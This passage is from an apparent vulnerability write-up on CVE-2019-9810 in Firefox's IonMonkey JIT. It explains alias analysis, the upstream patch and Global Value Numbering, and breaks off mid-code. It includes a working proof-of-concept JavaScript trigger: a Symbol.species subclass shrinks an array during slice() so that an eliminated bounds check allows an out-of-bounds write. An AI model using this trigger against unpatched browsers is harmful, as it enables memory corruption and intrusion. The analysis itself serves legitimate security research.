  MInstructionVector& aliasedStores = stores[*iter];
  for (int i = aliasedStores.length() - 1; i >= 0; i--) {
    MInstruction* store = aliasedStores[i];
    if (genericMightAlias(*def, store) !=
            MDefinition::AliasType::NoAlias &&
        def->mightAlias(store) != MDefinition::AliasType::NoAlias &&
        BlockMightReach(store->block(), *block)) {
      if (lastStore->id() < store->id()) {
        lastStore = store;
      }
      break;
    }
  }
}
def->setDependency(lastStore);
IonSpewDependency(*def, lastStore, "depends", "");


In our simple example, this is the only candidate so we do have what we are looking for :). And so a dependency is born..!

Of course we can also ensure that this result is shown in Ion's spew (with both alias and alias-sum channels turned on):

Processing store setinitializedlength14 (flags 1)
Load elements17 depends on store setinitializedlength14 ()
...
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements17 marked depending on setinitializedlength14


Great :).

At this point, we have an OK understanding of what is going on and what type of information the algorithm is looking for. What is also interesting is that the pass actually doesn't transform the MIR graph at all, it just analyzes it. Here is a small recap on how the analysis pass works against our code:

• It iterates over the instructions in the basic block and only cares about store and load instructions.
• If the instruction is a store, it gets added to a vector to keep track of it.
• If the instruction is a load, it is evaluated against every store in the vector:
  • mightAlias checks the intersection of both AliasSets,
  • genericMightAlias checks the intersection of both TypeSets.
• If the load and the store MayAlias, a dependency link is created between them.
• If the engine can prove that there is NoAlias possible, the algorithm simply carries on.
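The recap above can be compressed into a short sketch (illustrative only; the real pass keeps one vector per alias-set category and handles loops, whereas this keeps a single list for brevity):

```javascript
// Made-up category bits standing in for AliasSet flags.
const Flag = { Element: 1 << 0, ObjectFields: 1 << 1 };

function aliasAnalyze(instructions) {
  const stores = [];      // every store seen so far, in program order
  const deps = new Map(); // load -> most recent store it depends on
  for (const ins of instructions) {
    if (ins.set.store) {
      stores.push(ins);
      continue;
    }
    // Walk candidates from most recent to oldest and keep the first match.
    for (let i = stores.length - 1; i >= 0; i--) {
      const st = stores[i];
      const setsIntersect = (ins.set.flags & st.set.flags) !== 0;
      // Stand-in for genericMightAlias: unknown objects conservatively MayAlias.
      const objectsIntersect = !ins.obj || !st.obj || ins.obj === st.obj;
      if (setsIntersect && objectsIntersect) {
        deps.set(ins, st);
        break;
      }
    }
  }
  return deps;
}

// Mirror the running example: elements17 should depend on setinitializedlength14,
// not on storeelement13 (different category bit).
const storeelement13 = { name: "storeelement13", set: { store: true, flags: Flag.Element }, obj: "a" };
const setinitlen14 = { name: "setinitializedlength14", set: { store: true, flags: Flag.ObjectFields }, obj: "a" };
const elements17 = { name: "elements17", set: { store: false, flags: Flag.ObjectFields }, obj: "a" };
console.log(aliasAnalyze([storeelement13, setinitlen14, elements17]).get(elements17).name);
// → "setinitializedlength14"
```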

Even though the root-cause of the bug might be in there, we still need to have a look at what comes next in the optimization pipeline in order to understand how the results of this analysis are consumed. We can also expect that some of the following passes actually transform the graph which will introduce the exploitable behavior.

### Analysis of the patch

Now that we have a basic understanding of the Alias Analysis pass and some background information about how Ion works, it is time to get back to the problem we are trying to solve: what happens in CVE-2019-9810?

First things first: Mozilla fixed the issue by removing the alias set refinement done for the arrayslice instruction, which ensures the creation of dependencies between arrayslice and load instructions (and also means fewer opportunities for optimization):

# HG changeset patch
# User Jan de Mooij <[email protected]>
# Date 1553190741 0
# Node ID 229759a67f4f26ccde9f7bde5423cfd82b216fa2
# Parent  feda786b35cb748e16ef84b02c35fd12bd151db6
Bug 1537924 - Simplify some alias sets in Ion. r=tcampbell, a=dveditz

Differential Revision: https://phabricator.services.mozilla.com/D24400

diff --git a/js/src/jit/AliasAnalysis.cpp b/js/src/jit/AliasAnalysis.cpp
--- a/js/src/jit/AliasAnalysis.cpp
+++ b/js/src/jit/AliasAnalysis.cpp
@@ -128,17 +128,16 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::MaybeCopyElementsForWrite:
case MDefinition::Opcode::MaybeToDoubleElement:
case MDefinition::Opcode::TypedArrayLength:
case MDefinition::Opcode::TypedArrayByteOffset:
case MDefinition::Opcode::SetTypedObjectOffset:
case MDefinition::Opcode::SetDisjointTypedElements:
case MDefinition::Opcode::ArrayPopShift:
case MDefinition::Opcode::ArrayPush:
-    case MDefinition::Opcode::ArraySlice:
case MDefinition::Opcode::StoreTypedArrayElementHole:
case MDefinition::Opcode::StoreFixedSlot:
case MDefinition::Opcode::GetPropertyPolymorphic:
case MDefinition::Opcode::SetPropertyPolymorphic:
case MDefinition::Opcode::GuardShape:
@@ -153,16 +152,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::TypedArrayElements:
case MDefinition::Opcode::TypedObjectElements:
case MDefinition::Opcode::CopyLexicalEnvironmentObject:
case MDefinition::Opcode::IsPackedArray:
object = ins->getOperand(0);
break;
case MDefinition::Opcode::GetPropertyCache:
+    case MDefinition::Opcode::CallGetProperty:
case MDefinition::Opcode::GetDOMProperty:
case MDefinition::Opcode::GetDOMMember:
case MDefinition::Opcode::Call:
case MDefinition::Opcode::Compare:
case MDefinition::Opcode::GetArgumentsObjectArg:
case MDefinition::Opcode::SetArgumentsObjectArg:
case MDefinition::Opcode::GetFrameArgument:
case MDefinition::Opcode::SetFrameArgument:
@@ -179,16 +179,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::WasmAtomicExchangeHeap:
case MDefinition::Opcode::WasmStoreGlobalVar:
case MDefinition::Opcode::WasmStoreGlobalCell:
case MDefinition::Opcode::WasmStoreRef:
case MDefinition::Opcode::ArrayJoin:
+    case MDefinition::Opcode::ArraySlice:
return nullptr;
default:
#ifdef DEBUG
// Crash when the default aliasSet is overriden, but when not added in the
// list above.
if (!ins->getAliasSet().isStore() ||
ins->getAliasSet().flags() != AliasSet::Flag::Any) {
MOZ_CRASH(
diff --git a/js/src/jit/MIR.h b/js/src/jit/MIR.h
--- a/js/src/jit/MIR.h
+++ b/js/src/jit/MIR.h
@@ -8077,19 +8077,16 @@ class MArraySlice : public MTernaryInstr
TRIVIAL_NEW_WRAPPERS
NAMED_OPERANDS((0, object), (1, begin), (2, end))

JSObject* templateObj() const { return templateObj_; }

gc::InitialHeap initialHeap() const { return initialHeap_; }

-  AliasSet getAliasSet() const override {
-    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
-  }
bool possiblyCalls() const override { return true; }
bool appendRoots(MRootList& roots) const override {
return roots.append(templateObj_);
}
};

class MArrayJoin : public MBinaryInstruction,
public MixPolicy<ObjectPolicy<0>, StringPolicy<1>>::Data {
@@ -9660,17 +9657,18 @@ class MCallGetProperty : public MUnaryIn
// Constructors need to perform a GetProp on the function prototype.
// Since getters cannot be set on the prototype, fetching is non-effectful.
// The operation may be safely repeated in case of bailout.
void setIdempotent() { idempotent_ = true; }
AliasSet getAliasSet() const override {
if (!idempotent_) {
return AliasSet::Store(AliasSet::Any);
}
-    return AliasSet::None();
+    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
+                          AliasSet::DynamicSlot);
}
bool possiblyCalls() const override { return true; }
bool appendRoots(MRootList& roots) const override {
return roots.append(name_);
}
};

// Inline call to handle lhs[rhs]. The first input is a Value so that this


The instructions that don't define any refinement inherit the default behavior from js::jit::MDefinition::getAliasSet (both jit::MInstruction and jit::MPhi nodes inherit from jit::MDefinition):

virtual AliasSet getAliasSet() const {
  // Instructions are effectful by default.
  return AliasSet::Store(AliasSet::Any);
}


Just one more thing before getting back into Ion; here is the PoC file I use if you would like to follow along at home:

let Trigger = false;
let Arr = null;
let Spray = [];

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x30, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBBBBBBBB);
}

main();


It’s usually a good idea to compare the behavior of the patched component before and after the fix. Below are the summaries of the alias analysis pass without the fix and with it (alias-sum spew channel):

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


What you quickly notice is that in the fixed version a bunch of new load / store dependencies appear against the .slice statement (which translates to an arrayslice MIR instruction). As we can see in the fix for this issue, the developer disabled any alias set refinement and effectively opted the arrayslice instruction out of the alias analysis. If we take a look at the MIR graph of the Target function on a vulnerable build (on pass#9 Alias analysis and on pass#10 GVN), here is what we see:

Let's first start with what the MIR graph looks like after the Alias Analysis pass. The code is straightforward to go through and breaks down into the same three pieces as the original JavaScript code:

• The first step loads the Arr variable, converts the index Idx into an actual integer (tonumberint32), gets the length (it's not quite the length, but it doesn't matter for now) of the array (initializedlength), and finally ensures that the index is within Arr's bounds.
• Then, it invokes the slice operation (arrayslice) against the Special array passed as the first argument of the function.
• Finally, another set of instructions does much the same as the first step, but this time writes a different value (passed as the third argument of the function).

This sounds like a fair translation of the original code. Now, let's focus on the arrayslice instruction for a minute. In the previous section we looked at what the Alias Analysis does and how it does it. In this case, among the instructions coming after 27 | arrayslice unbox9:Object constant24:Int32 arraylength26:Int32, there is no instruction that loads anything related to unbox9:Object, and as a result none of those instructions gets a dependency on the slice operation. In the fixed version, even though we get the same MIR code, the alias set of the arrayslice instruction is now Store(Any); combined with the fact that GetObject returns null for it instead of grabbing its first operand, this makes genericMightAlias return Alias::MayAlias. When the engine cannot prove the absence of aliasing, it stays conservative and creates a dependency. That’s what explains this part of the alias-sum channel for the fixed version:

...
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


Now looking at the graph after the GVN pass has executed, we can see that it has been simplified. One transformation that sounds pretty natural is to eliminate a good part of the green block, as it is mostly a duplicate of the blue block; as a result, only the storeelement instruction is kept. This is safe under the assumption that Arr cannot change in between. Less code and one bounds check instead of two are also good for code size and runtime performance, which is Ion's ultimate goal.

At first sight, this might sound like a good and safe thing to do. JavaScript being JavaScript though, it turns out that if an attacker subclasses Array and provides an implementation for [Symbol.species], they can redefine the ctor of the Array object. Coupled with the fact that slicing a JavaScript array builds a new array, this gives you the opportunity to do badness here. For example, we can set Arr's length to zero, and because the bounds check happens only at the beginning of the function, we can modify the length after the 19 | boundscheck and before 36 | storeelement. If we do that, 36 effectively gives us the ability to write an Int32 out of Arr's bounds. Beautiful.

Implementing what is described above is pretty easy and here is the code for it:

let Trigger = false;
class SoSpecial extends Array {
  static get [Symbol.species]() {
    return function() {
      if(!Trigger) {
        return;
      }

      Arr.length = 0;
    };
  }
};


The Trigger variable allows us to control the behavior of SoSpecial's ctor and decide when to trigger the resizing of the array.
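If you want to convince yourself that slice really does run the species constructor in the middle of its work, here is a minimal standalone sketch; no vulnerable build is needed, any stock JS engine (e.g. Node.js) will do, and the variable names are mine:

```javascript
// Demonstrates that Array.prototype.slice consults
// constructor[Symbol.species] and invokes it before copying elements.
// That mid-operation callback is the window the PoC abuses to resize Arr.
let Called = false;

class SoSpecial extends Array {
  static get [Symbol.species]() {
    return function() {
      // User-controlled code running in the middle of slice().
      Called = true;
    };
  }
}

const Snowflake = new SoSpecial(1, 2, 3);
Snowflake.slice();
console.log(Called); // true: the species ctor ran during slice()
```

This is exactly why the side effect in SoSpecial's ctor fires between the two array accesses of Target: the JIT'd code calls into the slice machinery, which in turn calls back into attacker-controlled JavaScript.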

One important thing that we glossed over in this section is the relationship between the alias analysis results and how those results are consumed by the GVN pass. So as usual, let’s pop the hood and have a look at what actually happens :).

### Global Value Numbering

The pass that follows Alias Analysis in Ion’s pipeline is Global Value Numbering (abbreviated GVN), which is implemented in the ValueNumbering.cpp file:

  // Optimize the graph, performing expression simplification and
// canonicalization, eliminating statically fully-redundant expressions,
// deleting dead instructions, and removing unreachable blocks.
MOZ_MUST_USE bool run(UpdateAliasAnalysisFlag updateAliasAnalysis);


The interesting part of this comment for us is eliminating statically fully-redundant expressions: what if we could have it incorrectly eliminate a supposedly redundant bounds check, for example?

The pass itself isn’t as small as the alias analysis and looks more complicated, so we won’t follow the algorithm line by line like above. Instead, I am going to try to give you an idea of the type of modifications it can make to the graph and, more importantly, how it uses the dependencies established in the previous pass. We are lucky because this optimization pass is the only one documented on Mozilla’s wiki, which is great as it simplifies things for us: IonMonkey/Global value numbering.

By reading the wiki page we learn a few interesting things. First, each instruction is free to opt into GVN by providing an implementation for congruentTo and foldsTo. The default implementations of those functions are inherited from js::jit::MDefinition:

virtual bool congruentTo(const MDefinition* ins) const { return false; }

MDefinition* MDefinition::foldsTo(TempAllocator& alloc) {
  // In the default case, there are no constants to fold.
  return this;
}


The congruentTo function evaluates whether the current instruction is identical to the instruction passed as argument. If they are, one can be eliminated and replaced by the other; the discarded one makes the MIR code smaller and simpler. This is pretty intuitive and easy to understand. As the name suggests, the foldsTo function is commonly used (but not only) for constant folding, in which case it computes and returns a newly created MIR node. In the default case, the implementation returns this, which leaves the node in the graph unchanged.
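To make the foldsTo contract concrete, here is a toy model in plain JavaScript (not SpiderMonkey's C++; the class names are mine): a node either returns a brand new, simpler node, or `this` when there is nothing to fold.

```javascript
// Toy model of the foldsTo idea from js::jit::MDefinition.
class MConstantToy {
  constructor(value) { this.value = value; }
  foldsTo() { return this; } // a constant has nothing to fold
}

class MAddToy {
  constructor(lhs, rhs) { this.lhs = lhs; this.rhs = rhs; }
  foldsTo() {
    // If both operands are constants, fold the addition into a
    // new constant node; otherwise keep the node unchanged.
    if (this.lhs instanceof MConstantToy && this.rhs instanceof MConstantToy) {
      return new MConstantToy(this.lhs.value + this.rhs.value);
    }
    return this;
  }
}

const add = new MAddToy(new MConstantToy(2), new MConstantToy(3));
const folded = add.foldsTo();
console.log(folded instanceof MConstantToy, folded.value); // true 5
```

This mirrors the spew lines like "Folded ToNumberInt3216 to Unbox10" below: the pass asks a node to fold itself and, if a different node comes back, substitutes it in the graph.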

Another good source of help is the gvn spew channel, which is useful for following the code and what it does; here’s what it looks like:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
[GVN]       Recording Constant4
[GVN]       Replacing Constant5 with Constant4
[GVN]       Replacing Constant8 with Constant4
[GVN]       Recording Unbox9
[GVN]       Recording Unbox10
[GVN]       Recording Unbox11
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording Constant24
[GVN]       Recording Elements25
[GVN]       Recording ArrayLength26
[GVN]       Replacing Constant28 with Constant12
[GVN]       Replacing Slots29 with Slots13
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Replacing Elements32 with Elements17
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Recording Box37


At a high level, the pass iterates through the various instructions of our block and looks for opportunities to eliminate redundancies (congruentTo) and fold expressions (foldsTo). The logic that decides if two instructions are equivalent is in js::jit::ValueNumberer::VisibleValues::ValueHasher::match:

// Test whether two MDefinitions are congruent.
bool ValueNumberer::VisibleValues::ValueHasher::match(Key k, Lookup l) {
  // If one of the instructions depends on a store, and the other instruction
  // does not depend on the same store, the instructions are not congruent.
  if (k->dependency() != l->dependency()) {
    return false;
  }

  bool congruent =
      k->congruentTo(l);  // Ask the values themselves what they think.
#ifdef JS_JITSPEW
  if (congruent != l->congruentTo(k)) {
    JitSpew(
        JitSpew_GVN,
        "      congruentTo relation is not symmetric between %s%u and %s%u!!",
        k->opName(), k->id(), l->opName(), l->id());
  }
#endif
  return congruent;
}


Before invoking the instructions’ congruentTo implementation, the algorithm verifies that the two instructions share the same dependency. This is the very line that ties together the alias analysis results and the global value numbering optimization; pretty exciting, uh :)?
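The interplay between the two passes can be sketched with a small toy model in plain JavaScript (again not SpiderMonkey's C++; names are mine): two nodes are only candidates for merging when their store dependency is identical, no matter how alike they otherwise look.

```javascript
// Toy model of ValueHasher::match: the dependency check gates congruence.
class NodeToy {
  constructor(op, dependency) { this.op = op; this.dependency = dependency; }
  congruentTo(other) { return this.op === other.op; }
}

function match(k, l) {
  // Different store dependencies => not congruent, regardless of
  // what the instructions themselves think.
  if (k.dependency !== l.dependency) return false;
  return k.congruentTo(l);
}

const start = new NodeToy("start", null);
const slice = new NodeToy("arrayslice", start);

// Vulnerable world: both bounds checks depend on start6, so GVN
// considers them congruent and can drop the second one.
console.log(match(new NodeToy("boundscheck", start),
                  new NodeToy("boundscheck", start))); // true

// Fixed world: the second check depends on arrayslice27, so the
// dependency test fails and both checks survive.
console.log(match(new NodeToy("boundscheck", start),
                  new NodeToy("boundscheck", slice))); // false
```

That is exactly the difference you see between the two alias-sum dumps: same MIR, different dependencies, different GVN outcome.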

To understand what is going on, we need two things: the alias summary spew to see the dependencies, and the MIR code before the GVN pass has run. Here is the alias summary spew from the vulnerable version:

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6


And here is the MIR code:

On this diagram I have highlighted the two code regions that we care about. Those two regions are the same, which makes sense as they are the MIR code generated by the two statements Arr[Idx] = .. / Arr[Idx] = .... The GVN algorithm iterates through the instructions and eventually evaluates the first 19 | boundscheck instruction. Because it has never seen this expression, it records it in case it encounters a similar one in the future; if it does, it might choose to replace one instruction with the other. It carries on and eventually hits the other 34 | boundscheck instruction. At this point, it wants to know if 19 and 34 are congruent, and the first step to determine that is to evaluate whether those two instructions share the same dependency. In the vulnerable version, as you can see in the alias summary spew, those instructions all have the same dependency on start6, so the check is satisfied. The second step is to invoke MBoundsCheck's implementation of congruentTo, which ensures the two instructions are the same.

  bool congruentTo(const MDefinition* ins) const override {
    if (!ins->isBoundsCheck()) {
      return false;
    }
    const MBoundsCheck* other = ins->toBoundsCheck();
    if (minimum() != other->minimum() || maximum() != other->